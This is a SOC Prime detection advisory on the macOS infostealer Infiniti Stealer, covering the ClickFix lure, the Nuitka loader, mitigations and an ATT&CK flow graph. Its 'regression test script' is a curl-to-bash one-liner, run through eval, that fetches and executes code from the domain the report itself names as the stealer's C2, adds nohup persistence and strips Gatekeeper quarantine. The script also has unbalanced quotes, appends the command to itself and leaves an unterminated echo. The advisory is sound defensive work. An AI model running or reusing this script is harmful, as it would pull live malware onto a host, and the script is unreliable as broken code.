SOC Prime Bias: Medium

30 Mar 2026 15:52
newspaper icon Malwarebytes

Infiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Infiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

A newly identified macOS infostealer named Infiniti Stealer has been seen using a ClickFix social-engineering lure to infect users. The malware is built with Nuitka, which converts Python code into a native Mach-O binary, making static inspection more difficult. Once executed, it steals credentials, Keychain data, cryptocurrency wallet files, and other sensitive information, then exfiltrates the collected data through HTTP POST requests. The campaign also relies on a fake CAPTCHA page hosted on a malicious domain to trick victims into running a harmful Bash command.

Investigation

Researchers uncovered the payload during routine threat hunting and first tracked it under the temporary name NukeChain before the threat actor’s panel exposed the final branding as Infiniti Stealer. Analysis revealed a three-stage flow: a Bash dropper delivered through a fake CAPTCHA, a Nuitka-compiled loader, and a Python-based stealer module. The dropper places the binary in /tmp, strips the quarantine attribute, and launches it while passing C2 details through environment variables. The final stage gathers data from browsers, Keychain, wallets, and developer-related files before sending it to the attacker-controlled server.

Mitigation

Users should never copy and run commands from unknown websites, especially pages pretending to verify CAPTCHA challenges. Defenders should inspect and remove suspicious files in /tmp or ~/Library/LaunchAgents, run a trusted anti-malware scan, and rotate passwords for any potentially exposed accounts from a clean system. Any active API tokens or SSH keys that may have been collected should also be revoked.

Response

Detection teams should monitor for the dropper script and the Nuitka-compiled binary by watching file creation in /tmp that matches the described naming pattern. Alerts should trigger on execution of the malicious Bash command and on outbound HTTP POST traffic to the identified C2 domain. Network access to update-check.com and infiniti-stealer.com should be blocked. A host-based forensic review should then identify stolen credentials and support mandatory credential resets.

"graph TB %% Class definitions section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef artifact fill:#cccccc classDef operator fill:#ff9900 %% Node definitions action_initial_access["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/><b>Description</b>: Victim copies and pastes a malicious command into a terminal, leading to code execution."] class action_initial_access action artifact_captcha_page["<b>Artifact</b> – <b>Fake CAPTCHA page</b><br/>URL: update-check.com<br/>Provides copyu2011paste command to the victim."] class artifact_captcha_page artifact action_execution_dead_drop["<b>Action</b> – <b>T1102.001 Web Service: Dead Drop Resolver</b><br/><b>Description</b>: Uses a web service as a deadu2011drop to retrieve additional payloads."] class action_execution_dead_drop action process_curl_download["<b>Process</b> – <b>curl</b><br/><b>Command</b>: curl -sSfL … | bash<br/>Downloads stageu20111 Bash dropper."] class process_curl_download process artifact_temp_binary["<b>Artifact</b> – <b>Temporary binary</b><br/>Location: /tmp/<br/>Quarantine flag removed after download."] class artifact_temp_binary artifact action_defense_evasion_sandbox["<b>Action</b> – <b>T1497.002 User Activity Checks</b> & <b>T1497.003 Time Based Evasion</b><br/><b>Description</b>: Detects virtualization or analysis environments before proceeding."] class action_defense_evasion_sandbox action action_guardrails["<b>Action</b> – <b>T1480.002 Execution Guardrails: Mutual Exclusion</b><br/><b>Description</b>: Ensures only a single instance runs on the host."] class action_guardrails action action_file_deletion["<b>Action</b> – <b>T1070.004 File Deletion</b><br/><b>Description</b>: Deletes temporary files and logs after use."] class action_file_deletion action action_obfuscation["<b>Action</b> – <b>T1027.005 Obfuscated Files or Information</b><br/><b>Description</b>: Uses obfuscation to hide malicious payloads."] class action_obfuscation action action_collection_input_capture["<b>Action</b> – <b>T1056 Input Capture</b><br/><b>Description</b>: Captures browser credentials, keychain entries, crypto wallet data, and screenshots."] class action_collection_input_capture action artifact_collected_data["<b>Artifact</b> – <b>Collected Sensitive Data</b><br/>Browser credentials, keychain entries, crypto wallet files, screenshots."] class artifact_collected_data artifact action_exfiltration_alternative["<b>Action</b> – <b>T1048 Exfiltration Over Alternative Protocol</b><br/><b>Description</b>: Sends data via HTTP POST to a remote server."] class action_exfiltration_alternative action artifact_c2_domain["<b>Artifact</b> – <b>C2 Domain</b><br/>update-check.com"] class artifact_c2_domain artifact artifact_telegram_notification["<b>Artifact</b> – <b>Telegram Notification</b><br/>Attacker receives status updates via Telegram."] class artifact_telegram_notification artifact action_lateral_tool_transfer["<b>Action</b> – <b>T1570 Lateral Tool Transfer</b><br/><b>Description</b>: Downloads additional payloads on demand for further compromise."] class action_lateral_tool_transfer action artifact_additional_payload["<b>Artifact</b> – <b>Additional Payloads</b><br/>Downloaded as needed for later stages."] class artifact_additional_payload artifact %% Connections showing flow action_initial_access –>|delivers| artifact_captcha_page artifact_captcha_page –>|triggers| action_execution_dead_drop action_execution_dead_drop –>|uses| process_curl_download process_curl_download –>|writes| artifact_temp_binary artifact_temp_binary –>|enables| action_defense_evasion_sandbox action_defense_evasion_sandbox –>|includes| action_guardrails action_defense_evasion_sandbox –>|includes| action_file_deletion action_defense_evasion_sandbox –>|includes| action_obfuscation action_file_deletion –>|removes| artifact_temp_binary action_obfuscation –>|obfuscates| artifact_temp_binary action_defense_evasion_sandbox –>|leads_to| action_collection_input_capture action_collection_input_capture –>|captures| artifact_collected_data artifact_collected_data –>|sent_via| action_exfiltration_alternative action_exfiltration_alternative –>|targets| artifact_c2_domain artifact_c2_domain –>|notifies| artifact_telegram_notification action_exfiltration_alternative –>|enables| action_lateral_tool_transfer action_lateral_tool_transfer –>|downloads| artifact_additional_payload "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Attack Narrative & Commands

An attacker delivers a phishing link that, when opened on a macOS workstation, runs the following one‑liner in Terminal. The command:

  1. Downloads a base64‑encoded URL (the payload host) via curl -sSfL.
  2. Decodes the base64 string to reveal the actual HTTPS URL.
  3. Executes the downloaded script with bash.
  4. Runs it under nohup to keep it alive after the terminal is closed.
  5. Strips the quarantine attribute (xattr -dr com.apple.quarantine) to bypass Gatekeeper.

These steps produce the exact command‑line fragments the Sigma rule is watching for, thereby generating the expected alert.

Regression Test Script

#!/usr/bin/env bash
# ------------------------------------------------------------
# Infiniti Stealer infection simulation (macOS)
# ------------------------------------------------------------

# 1. Build the malicious one‑liner (exactly as the rule expects)
MALICIOUS_CMD="bash <(curl -sSfL $(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 --decode))"

# 2. Optional persistence helpers (included in detection)
MALICIOUS_CMD+=" && nohup bash -c "$MALICIOUS_CMD" >/dev/null 2>&1 &"
MALICIOUS_CMD+=" && xattr -dr com.apple.quarantine /Applications/Utilities/Terminal.app"

# 3. Execute the command
eval "$MALICIOUS_CMD"

# 4. Wait a few seconds to allow SIEM ingestion
sleep 5

# 5. Output a marker for manual verification
echo ">>> Simulation executed – monitor SIEM for alert <<<

Cleanup Commands

#!/usr/bin/env bash
# ------------------------------------------------------------
# Cleanup after Infiniti Stealer simulation
# ------------------------------------------------------------

# Kill any background nohup processes started by the simulation
pkill -f "bash <(curl -sSfL"

# Remove any temporary files that might have been created
rm -f /tmp/$(ls /tmp | grep -E 'tmp|bash|curl' | head -n 1)

# Restore quarantine attribute on Terminal (optional, for hygiene)
xattr -w com.apple.quarantine "0081;5f4a9b2c;Safari;1234567890" /Applications/Utilities/Terminal.app 2>/dev/null || true

echo "Cleanup completed."

End of Report

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free